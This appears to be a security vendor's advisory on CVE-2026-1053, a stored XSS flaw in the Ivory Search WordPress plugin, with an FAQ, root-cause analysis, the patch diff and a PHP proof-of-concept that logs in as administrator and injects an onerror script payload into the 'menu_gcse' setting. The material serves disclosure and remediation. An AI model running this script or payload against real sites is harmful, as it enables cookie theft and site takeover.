What is CVE-2026-1053?

CVE-2026-1053 is a stored cross-site scripting (XSS) vulnerability in the Ivory Search WordPress plugin. It allows authenticated users with administrator-level permissions to inject malicious scripts via the ‘menu_gcse’ and ‘nothing_found_text’ parameters in the plugin’s settings.

How does the vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping in the plugin. Attackers can inject JavaScript payloads into specific settings, which are then stored in the database and executed whenever users access the affected search functionality.

Who is affected by this vulnerability?

All installations of the Ivory Search plugin up to and including version 5.5.13 are affected. This vulnerability specifically impacts multi-site installations and standard installations where the unfiltered_html capability is disabled.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the Ivory Search plugin installed. If it is version 5.5.13 or earlier, and if you have administrator privileges, your site is at risk. Additionally, review the settings for the ‘menu_gcse’ and ‘nothing_found_text’ parameters for any suspicious content.

How can I fix this vulnerability?

The vulnerability is patched in version 5.5.14 of the Ivory Search plugin. To fix the issue, update the plugin to the latest version as soon as possible. Regularly check for updates to ensure ongoing security.

What does the risk level 'Medium' mean?

A ‘Medium’ risk level indicates that while the vulnerability requires authenticated access to exploit, it can still lead to significant consequences, such as session hijacking or content defacement. Administrators should prioritize remediation to protect site integrity.

What is the CVSS score of this vulnerability?

CVE-2026-1053 has a CVSS score of 4.4. This score reflects the potential impact and exploitability of the vulnerability, indicating that it poses a moderate threat to affected systems.

How does the proof of concept demonstrate the issue?

The proof of concept provided shows how an attacker can log in as an administrator and inject a malicious script into the ‘menu_gcse’ parameter. This script can execute when users interact with the compromised search functionality, illustrating the practical implications of the vulnerability.

What are the potential consequences of exploitation?

Successful exploitation of this vulnerability can lead to arbitrary JavaScript execution in the context of any user viewing the affected pages. This can result in session hijacking, administrative account takeover, or redirection to malicious sites, affecting all site visitors.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the Ivory Search plugin until it can be updated. Additionally, review user permissions and limit access to trusted administrators to reduce the risk of exploitation.

How can I secure my WordPress site against future vulnerabilities?

To enhance security, regularly update all plugins and themes, use strong passwords, and limit user permissions. Implement security plugins that monitor for vulnerabilities and consider regular security audits to identify and address potential risks.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-1053: Ivory Search <= 5.5.13 – Authenticated (Administrator+) Stored Cross-Site Scripting via 'menu_gcse' and 'nothing_found_text' Parameters (add-search-to-menu)

CVE ID CVE-2026-1053

Plugin add-search-to-menu

Severity Medium (CVSS 4.4)

CWE 79

Vulnerable Version 5.5.13

Patched Version 5.5.14

Disclosed January 26, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1053:
This vulnerability is an authenticated stored cross-site scripting (XSS) flaw in the Ivory Search WordPress plugin. It affects the plugin’s admin settings functionality, allowing attackers with administrator-level permissions to inject malicious scripts. The vulnerability has a CVSS score of 4.4 and affects all plugin versions up to and including 5.5.13. Exploitation requires either a multisite installation or a standard WordPress installation where the unfiltered_html capability has been disabled.

The root cause is insufficient output escaping in three specific locations where user-controlled parameters are rendered. The vulnerable parameters are ‘menu_gcse’ and ‘nothing_found_text’. In the file add-search-to-menu/public/class-is-public.php, lines 204 and 249 directly output the ‘menu_gcse’ parameter value without proper sanitization. In add-search-to-menu/public/partials/is-ajax-results.php, line 148 outputs the ‘nothing_found_text’ parameter using html_entity_decode() without subsequent escaping, allowing script execution.

An attacker with administrator privileges would exploit this vulnerability by navigating to the Ivory Search plugin settings page. They would inject JavaScript payloads into either the ‘menu_gcse’ or ‘nothing_found_text’ parameter fields. The ‘menu_gcse’ parameter appears in the plugin’s menu search configuration, while ‘nothing_found_text’ controls the message displayed when no search results are found. When these settings are saved, the malicious payloads persist in the database and execute whenever the affected search functionality renders on the frontend.

The patch adds wp_kses_post() output escaping to all three vulnerable locations. In add-search-to-menu/public/class-is-public.php, lines 204 and 249 now wrap $this->opt[‘menu_gcse’] with wp_kses_post(). In add-search-to-menu/public/partials/is-ajax-results.php, line 148 replaces html_entity_decode($field[‘nothing_found_text’]) with wp_kses_post($field[‘nothing_found_text’]). The wp_kses_post() function filters content for allowed HTML tags and attributes, preventing script injection while preserving basic formatting.

Successful exploitation allows attackers to execute arbitrary JavaScript in the context of any user viewing pages containing the compromised search functionality. This can lead to session hijacking, administrative account takeover, content defacement, or redirection to malicious sites. The stored nature means the payload executes repeatedly without further attacker interaction. While administrator privileges are required for initial injection, the impact extends to all site visitors and users.

Differential between vulnerable and patched code

Code Diff

--- a/add-search-to-menu/add-search-to-menu.php
+++ b/add-search-to-menu/add-search-to-menu.php
@@ -4,7 +4,7 @@
  * Plugin Name: Ivory Search
  * Plugin URI:  https://ivorysearch.com
  * Description: The WordPress Search plugin that provides Search Form Customizer, WooCommerce Search, Image Search, Search Shortcode, AJAX Search & Live Search support!
- * Version:     5.5.13
+ * Version:     5.5.14
  * Author:      Ivory Search
  * Author URI:  https://ivorysearch.com/
  * License:     GPL2+
@@ -70,7 +70,7 @@
      */
     public function define_constants() {
         if ( !defined( 'IS_VERSION' ) ) {
-            define( 'IS_VERSION', '5.5.13' );
+            define( 'IS_VERSION', '5.5.14' );
         }
         if ( !defined( 'IS_PLUGIN_FILE' ) ) {
             define( 'IS_PLUGIN_FILE', __FILE__ );
--- a/add-search-to-menu/admin/class-is-editor.php
+++ b/add-search-to-menu/admin/class-is-editor.php
@@ -2484,7 +2484,7 @@
         $conflicts = [];
         $index_opt = IS_Index_Options::getInstance();
         if ( IS_Index_Model::is_index_empty() ) {
-            $conflicts['index'] = esc_html__( 'The Index should be created to use this option in the Index ' ) . $index_opt->get_index_settings_link();
+            $conflicts['index'] = esc_html__( 'The Index should be created to use this option in the Index ', 'add-search-to-menu' ) . $index_opt->get_index_settings_link();
         }
         $props = $this->search_form->get_properties();
         foreach ( $props as $key => $group ) {
--- a/add-search-to-menu/admin/partials/settings-form.php
+++ b/add-search-to-menu/admin/partials/settings-form.php
@@ -111,7 +111,7 @@
 							<div id="major-publishing-actions">
 								<div id="publishing-action">
 									<span class="spinner"></span>
-									<?php submit_button( 'Save', 'primary', 'ivory_search_options_submit', false ); ?>
+									<?php submit_button( __('Save', 'add-search-to-menu'), 'primary', 'ivory_search_options_submit', false ); ?>
 									<?php if( 'index' == $tab ): ?>
 										<?php
 											$action = 'index-reset';
--- a/add-search-to-menu/public/class-is-public.php
+++ b/add-search-to-menu/public/class-is-public.php
@@ -201,7 +201,7 @@
         if ( isset( $this->opt['menus'] ) && isset( $this->opt['menus'][$args->theme_location] ) || isset( $this->opt['menu_name'] ) && isset( $this->opt['menu_name'][$menu_name] ) ) {
             $temp = '';
             if ( isset( $this->opt['menu_gcse'] ) && '' != $this->opt['menu_gcse'] ) {
-                $temp .= '<li class="gsc-cse-search-menu">' . $this->opt['menu_gcse'] . '</li>';
+                $temp .= '<li class="gsc-cse-search-menu">' . wp_kses_post( $this->opt['menu_gcse'] ) . '</li>';
             } else {
                 $search_class = ( isset( $this->opt['menu_classes'] ) ? $this->opt['menu_classes'] . ' astm-search-menu is-menu ' : ' astm-search-menu is-menu ' );
                 $search_class .= ( isset( $this->opt['menu_style'] ) && 'dropdown' != $this->opt['menu_style'] ? $this->opt['menu_style'] : 'is-dropdown' );
@@ -246,7 +246,7 @@
     function header_menu_search() {
         $items = '';
         if ( isset( $this->opt['menu_gcse'] ) && $this->opt['menu_gcse'] != '' ) {
-            $items .= '<div class="astm-search-menu-wrapper is-menu-wrapper"><div class="gsc-cse-search-menu">' . $this->opt['menu_gcse'] . '</div></div>';
+            $items .= '<div class="astm-search-menu-wrapper is-menu-wrapper"><div class="gsc-cse-search-menu">' . wp_kses_post( $this->opt['menu_gcse'] ) . '</div></div>';
         } else {
             $search_class = ( isset( $this->opt['menu_classes'] ) ? $this->opt['menu_classes'] . ' astm-search-menu is-menu ' : ' astm-search-menu is-menu ' );
             $search_class .= ( isset( $this->opt['menu_style'] ) && 'dropdown' != $this->opt['menu_style'] ? $this->opt['menu_style'] : 'is-dropdown' );
--- a/add-search-to-menu/public/partials/is-ajax-results.php
+++ b/add-search-to-menu/public/partials/is-ajax-results.php
@@ -145,7 +145,7 @@
 	} else if( empty( $tags ) && empty( $categories )) {
 		?>
 		<div class="is-ajax-search-no-result">
-			<?php echo html_entity_decode( $field['nothing_found_text'] ); ?>
+			<?php echo wp_kses_post( $field['nothing_found_text'] ); ?>
 		</div>
 		<?php
 	}

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1053 - Ivory Search <= 5.5.13 - Authenticated (Administrator+) Stored Cross-Site Scripting via 'menu_gcse' and 'nothing_found_text' Parameters

<?php
/**
 * Proof of Concept for CVE-2026-1053
 * Requires valid administrator credentials and a WordPress nonce from the Ivory Search settings page.
 * This script demonstrates XSS payload injection via the 'menu_gcse' parameter.
 */

$target_url = 'https://vulnerable-site.com';
$username = 'admin';
$password = 'password';

// XSS payload to inject
$payload = '<img src=x onerror=alert(document.cookie)>';

// Initialize cURL session for WordPress login
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => 1
]));
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
$response = curl_exec($ch);

// Navigate to Ivory Search settings page to obtain nonce
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin.php?page=ivory-search');
curl_setopt($ch, CURLOPT_POST, 0);
$response = curl_exec($ch);

// Extract nonce from the settings page (simplified - real implementation needs proper parsing)
// In practice, you would parse the HTML response for the nonce field named '_wpnonce'
// This example assumes you've manually obtained the nonce
$nonce = 'abc123nonce';

// Inject payload into menu_gcse parameter
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin.php?page=ivory-search');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'menu_gcse' => $payload,
    '_wpnonce' => $nonce,
    'action' => 'save',
    'tab' => 'menu-search'
]));
$response = curl_exec($ch);

// Verify injection by checking if payload appears in response
if (strpos($response, $payload) !== false) {
    echo "Payload successfully injected. Visit any page with the search menu to trigger XSS.n";
} else {
    echo "Injection may have failed. Check credentials and nonce.n";
}

curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2026-1053?
Overview of the vulnerability
CVE-2026-1053 is a stored cross-site scripting (XSS) vulnerability in the Ivory Search WordPress plugin. It allows authenticated users with administrator-level permissions to inject malicious scripts via the ‘menu_gcse’ and ‘nothing_found_text’ parameters in the plugin’s settings.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping in the plugin. Attackers can inject JavaScript payloads into specific settings, which are then stored in the database and executed whenever users access the affected search functionality.
Who is affected by this vulnerability?
Identifying vulnerable installations
All installations of the Ivory Search plugin up to and including version 5.5.13 are affected. This vulnerability specifically impacts multi-site installations and standard installations where the unfiltered_html capability is disabled.
How can I check if my site is vulnerable?
Assessment steps
To determine if your site is vulnerable, check the version of the Ivory Search plugin installed. If it is version 5.5.13 or earlier, and if you have administrator privileges, your site is at risk. Additionally, review the settings for the ‘menu_gcse’ and ‘nothing_found_text’ parameters for any suspicious content.
How can I fix this vulnerability?
Mitigation steps
The vulnerability is patched in version 5.5.14 of the Ivory Search plugin. To fix the issue, update the plugin to the latest version as soon as possible. Regularly check for updates to ensure ongoing security.
What does the risk level 'Medium' mean?
Understanding risk assessment
A ‘Medium’ risk level indicates that while the vulnerability requires authenticated access to exploit, it can still lead to significant consequences, such as session hijacking or content defacement. Administrators should prioritize remediation to protect site integrity.
What is the CVSS score of this vulnerability?
CVSS score details
CVE-2026-1053 has a CVSS score of 4.4. This score reflects the potential impact and exploitability of the vulnerability, indicating that it poses a moderate threat to affected systems.
How does the proof of concept demonstrate the issue?
Exploit demonstration
The proof of concept provided shows how an attacker can log in as an administrator and inject a malicious script into the ‘menu_gcse’ parameter. This script can execute when users interact with the compromised search functionality, illustrating the practical implications of the vulnerability.
What are the potential consequences of exploitation?
Impact of successful attacks
Successful exploitation of this vulnerability can lead to arbitrary JavaScript execution in the context of any user viewing the affected pages. This can result in session hijacking, administrative account takeover, or redirection to malicious sites, affecting all site visitors.
What should I do if I cannot update the plugin immediately?
Temporary mitigation measures
If immediate updates are not possible, consider disabling the Ivory Search plugin until it can be updated. Additionally, review user permissions and limit access to trusted administrators to reduce the risk of exploitation.
How can I secure my WordPress site against future vulnerabilities?
Best practices for security
To enhance security, regularly update all plugins and themes, use strong passwords, and limit user permissions. Implement security plugins that monitor for vulnerabilities and consider regular security audits to identify and address potential risks.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations